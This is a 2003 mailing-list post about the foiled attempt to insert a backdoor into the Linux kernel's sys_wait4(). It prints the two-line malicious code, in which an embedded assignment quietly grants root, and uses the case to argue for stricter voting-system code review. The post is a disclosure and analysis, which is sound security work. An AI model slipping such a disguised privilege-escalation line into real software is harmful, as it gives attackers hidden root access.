Thwarted Linux backdoor

Douglas W. Jones jones at cs.uiowa.edu
Tue Nov 11 07:21:16 PST 2003


On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
Linux was averted.  This is a really good example of the subtle kinds of
hacks a source code examiner must be waiting to catch if we want genuinely
secure voting systems under the current model of proprietary DRE systems
with a closed-door source code examination.

Someone broke into a server at kernel.kbits.net and inserted the following
code into the Linux kernel:

         if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                         retval = -EINVAL;

This was done in the code sys_wait4().  Larry McVoy caught the fact that the
change had been made, and was annoyed because it wasn't logged properly.
Matthew Dharm asked "Out of curiosity, what were the changed lines."  Zwane
Mwaikambo responded "That looks odd", and Andries Brouwer responded "Not if
you hope to get root."

So, an annoying violation of the software change logging requirements turned
out to be an attempt to install a backdoor in Linux.  At least two very
experienced programmers looked at it and saw just slightly odd code, before
the serious nature of the threat was actually discovered.

This particular attack, by the way, is ruled out by the current voting
system standards, not because they require a comprehensive security
analysis, but because of their C-centered coding rules.  Embedded assignment
is forbidden.  Current source code checks are good at finding embedded
assignments and flagging them (as long as the code is written in C).  No
doubt, a hacker of the sophistication suggested by the attack illustrated
above would strictly adhere to the coding guidelines in formulating their
attack.

For the complete story of this attack on Linux, including the actual E-mail
exchange documenting the discovery of the attack, see:

     http://kerneltrap.org/node/view/1584
     Linux: Kernel "Back Door" Attempt

This attack has only made the mainstream media in one place, so far:

     http://www.smh.com.au/articles/2003/11/07/1068013371170.html
     Bid to backdoor Linux kernel detected - smh.com.au

This is a pity, because I think this story is really important.


----- End forwarded message -----
-- Eugen* Leitl <a href="http://leitl.org">leitl</a>
______________________________________________________________
ICBM: 48.07078, 11.61144 http://www.leitl.org
8B29F6BE: 099D 78BA 2FD3 B014 B08A  7779 75B0 2443 8B29 F6BE

[demime 0.97c removed an attachment of type application/pgp-signature]





More information about the cypherpunks-legacy mailing list